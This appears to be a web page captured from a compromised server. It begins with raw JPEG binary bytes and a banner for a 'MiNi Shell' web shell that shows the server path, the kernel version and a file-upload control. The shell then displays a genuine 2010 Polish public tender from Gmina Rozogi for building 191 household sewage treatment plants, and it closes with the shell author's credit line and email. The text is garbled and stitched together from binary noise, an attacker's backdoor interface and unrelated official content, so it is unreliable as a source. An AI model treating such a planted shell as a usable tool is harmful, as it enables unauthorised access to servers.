JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/14403-N-2010.html

<p class="kh_header"><b>Rozogi: Budowa przydomowych oczyszczalni ścieków dla zabudowy kolonijnej</b><br>
<b>Numer ogłoszenia: 14403 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rozogi , ul. 22 Lipca 22, 12-114 Rozogi, woj. warmińsko-mazurskie, tel. 089 7226002, faks 089 7226055.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rozogi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przydomowych oczyszczalni ścieków dla zabudowy kolonijnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa 191 szt. przydomowych oczyszczalni ścieków na terenie Gminy Rozogi (w 24 miejscowościach) w kolejności określonej przez Zamawiającego, zgodnie z załączonym wykazem stanowiącym załącznik          nr 1 do SIWZ.
Typy oczyszczalni ścieków:
a)	SC - 4 - 143 szt., z czego 
-	bez nadstawki - 109 szt.,
-	z nadstawką o wys. 0,3 m - 32 szt.,
-	z nadstawką o wys. 0,6 m - 2 szt.
b)  SC - 8 - 43 szt., z czego:
-	bez nadstawki  - 33 szt.,
-	z nadstawką o wys. 0,3 m - 10 szt.,
c)  SC - 12 - 4 szt. bez nadstawki
d)	SC - 100 - 1 szt.
W zakres oczyszczalni SC-100 wchodzi:
-	rurociąg doprowadzający ścieki do oczyszczalni z PCV O 200 mm - 25 m,
-	studzienka rewizyjna z PCV O 400 mm - szt. 1,
-	przepompownia ścieków - P-1,
-	rurociąg z PCV O 160 mm odprowadzający oczyszczone ścieki do oczka wodnego - stawu - 42 m,
-	studzienka drenarska z osadnikiem z PCV O 400 mm - szt. 1,
-	oczko wodne-staw o powierzchni 0,11 ha przy pojemności całkowitej 1.783 m3,
-	zasilenie w energie elektryczną przydomowej oczyszczalni z budynku przystosowanego na ŚDS poprzez istniejący budynek gospodarczy.
Przy wykonastwie wykopów na większych głębokościach może wystąpić woda gruntowa, w związku z tym przewiduje się odwodnienie wykopów igłofiltrami.
2. Biologiczna oczyszczalnia ścieków typu SC jest urządzeniem zbudowanym z elementów technologicznych zwartych w jednym cylindrycznym bloku. Reaktor biologiczny skonstruowano jako jednostkę kompaktową bez osadnika gnilnego podzieloną na jednolite funkcjonalne komory tj. strefę mechanicznego podczyszczania (sedymentacji), komorę denitryfikacyjną, komorę aktywnej nitryfikacji i osadnik wtórny, podłączone do wspólnego systemu obiegu powietrza. Membranowa pompa powietrzna zapewnia napowietrzanie, wewnętrzną cyrkulację i mieszanie ścieków. 
3. Wszystkie elementy technologiczne oczyszczalni wykonane są ze stali nierdzewnej chromowo-niklowo-molibdenowej wg DIN 1.4571.
4. Układ napowietrzania, układ sterujący i przyłącze elektryczne instaluje się w budynku mieszkalnym lub w wolnostojącej szafie.
5. W przypadku głębokiego posadowienia kanalizacji wychodzącej z budynku lub       z uwagi na specyficzne warunki terenowe, na przydomowe biologiczne oczyszczalnie ścieków typu SC instaluje się nadstawki.
6. Oczyszczalnie zastosowane w projekcie muszą spełniać normę PN-EN 12566-3 oraz posiadać znak CE i certyfikaty potwierdzające spełnienie przez producenta odpowiednich norm jakościowych produkcji takich jak: ISO9001, ISO14001, które należy załączyć do oferty przetargowej.
7. Całość ścieków powstałych w budynkach odprowadzana będzie kanałem PCV O 160 na ciąg oczyszczania.
8. Ważniejsze cechy konstrukcyjne biologicznej oczyszczalni ścieków typu SC:
-	wykonana ze stali nierdzewnej kwasoodpornej Cr-Ni-Mo,
-	wysoka trwałość reaktora i konstrukcji,
-	innowacyjna konstrukcja i nowoczesna technologia,
-	obudowa kompaktowa (bez zbiornika betonowego),
-	budowa modułowa,
-	instalacja oczyszczalni wymaga niewielkiego miejsca na działce,
-	instalacja bezpośrednio do gruntu, łatwy montaż,
-	urządzenie praktycznie bezobsługowe, sterowane automatyką.
-	stabilna praca oczyszczalni w przypadku 24 godzinnego zaniku zasilania,
-	odporność oczyszczalni na jednorazowy duży spływ zimnej wody,
-	możliwość samodzielnego powrotu oczyszczalni do stabilnej pracy po dwutygodniowym  zaniku dopływu ścieków na przykład w okresie urlopowym.
9. W ramach zamówienia oprócz dostawy i montażu urządzeń i wykonaniu wszelkich robót budowlanych Wykonawca zobowiązany jest również:
a) wykonać pomiary instalacji elektrycznej zasilającej oczyszczalnię S.C.-100 wraz   z przepompownią,
b)	przeprowadzić rozruch wybudowanych oczyszczalni ścieków, aż do osiągnięcia pełnego efektu oczyszczania ścieków,
c)	dostarczyć dokumentację techniczno - ruchową,
d)	zlecić i uzyskać pozytywne wyniki badań ścieków oczyszczonych (zgodnie      z obowiązującymi przepisami w zakresie jakości ścieków odprowadzonych do środowiska) dla każdej oczyszczalni przeprowadzone przez stację sanitarno - epidemiologiczną bądź inne akredytowane laboratorium,
e)	przeprowadzić szkolenie dla przyszłych użytkowników oczyszczalni w zakresie obsługi i eksploatacji urządzeń wraz z przekazaniem instrukcji obsługi,
f)	zapewnić pełną obsługę geodezyjną (wytyczenie, inwentaryzacja geodezyjna powykonawcza).
10. Szczegółowy zakres przedsięwzięcia zawarty jest w projektach technicznych, przedmiarach robót i specyfikacji technicznej wykonania i odbioru robót, stanowiących załącznik do niniejszej specyfikacji oraz pozwoleniu na budowę i zgłoszeniach zamiaru budowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.24.21-9, 45.23.24.40-8, 45.23.14.00-9, 45.23.24.23-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 100.000 zł (słownie: sto tysięcy złotych) należy wnieść przed terminem składania ofert w formie zgodnej z art. 45 ust. 6 ustawy - Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają  obowiązek ich posiadania;
2.	posiadania wiedzy i doświadczenie;
3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4.	sytuacji ekonomicznej i finansowej.
Oceny spełnienia warunków Zamawiający dokona poprzez sprawdzenie odpowiednich dokumentów/ oświadczeń potwierdzających spełnienie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ OŚWIADCZEŃ I DOKUMENTY JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.

Wykonawca ubiegający się o zamówienie musi załączyć do oferty następujące dokumenty /oświadczenia:
1.	dowód wpłacenia /wniesienia w terminie wadium w wysokości określonej przez Zamawiającego,
2.	oświadczenie o spełnieniu warunków na podstawie art. 22 ust. 1 ustawy - Prawo zamówień publicznych (wzór zał. nr 3),
3.	oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych - (wzór zał. nr 4),
4.	upoważnienie do podpisania oferty o ile nie wynika ono z innych dokumentów,
5.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy - Prawo zamówień publicznych,
6.	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
7.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych  lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
8.	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym                      w art. 24 ust. 1 pkt. 4 - 8 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
9.	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym                      w art. 24 ust. 1 pkt. 9 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10.	sprawozdanie finansowe albo jego części, a jeżeli podlega on badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio                o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
11.	informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy nie mniejszą niż 3,5 mln złotych, wystawioną nie wcześniej niż  3 miesiące przed upływem terminu składania ofert,
12.	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  1 mln złotych,
13.	wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone                   Do każdej pozycji wykazu należy załączyć dokumenty takie jak: listy referencyjne, protokoły odbioru itp. - (wzór zał. nr 5), 
Wykonawca musi udokumentować, że zrealizował co najmniej dwie roboty budowlane polegające na budowie oczyszczalni ścieków, w tym jednej roboty polegającej na budowie co najmniej 90 szt. przydomowych oczyszczalni ścieków              o wartości brutto nie mniejszej niż 2,5 mln zł. oraz wykonał instalację kanalizacji sanitarnej i wodociągów o wartości nie mniejszej niż 1 mln zł.,  
14.	wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją                o podstawie dysponowania tymi zasobami - (wzór zał. nr 6),   
15.	oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie - (wzór zał. nr 7),
16.	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami -  (wzór zał. nr 8).
Wśród osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia publicznego musi być co najmniej:
a)	1 osoba, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych, będąca członkiem właściwej izby samorządu zawodowego,
b)	1 osoba, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, będąca członkiem właściwej izby samorządu zawodowego,
c)	1 osoba, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, będąca członkiem właściwej izby samorządu zawodowego, 
17.	oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
18.	jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, w takiej sytuacji wykonawca zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór zał. nr 9), a w szczególności:
a)   wykaz wykonanych robót budowlanych - zgodnie z pkt. 13 SIWZ,
b)   wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych - zgodnie
       z pkt. 14 SIWZ,
d)	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia - zgodnie 
      z pkt. 16 i 17 SIWZ.  

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich. Ocenie podlegać będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich                           w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz załączyć pełnomocnictwo do oferty. Jeżeli oferta zostanie uznana za najkorzystniejszą przed podpisaniem umowy o realizację zamówienia zobowiązani będą przedstawić Zamawiającemu kopię umowy regulującej współpracę tych wykonawców. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.

W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów określonych w pkt. 2 - 8 SIWZ składa dokumenty określone w § 4 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców, oraz form, w jakich te dokumenty mogą być składane (Dz. U z 2009r. nr 226, poz. 1817).

Dokumenty powinny być składane w oryginale lub kopii poświadczonej za zgodność                z oryginałem przez wykonawcę.

POZOSTAŁE DOKUMENTY WYMAGANE PRZEZ ZAMAWIAJĄCEGO:  

1.	Formularz ofertowy - (wzór zał. nr 2).
2.	Harmonogram rzeczowo - finansowy realizacji zamówienia zgodnie z zakresem zamówienia - (wzór zał. nr 10)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://rozogi-ug.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rozogi, ul. 22 Lipca 22, 12-114 Rozogi.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2010 godzina 10:00, miejsce: Urząd Gminy Rozogi, ul.22 Lipca 22, 12-114 Rozogi, pok. nr 12 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com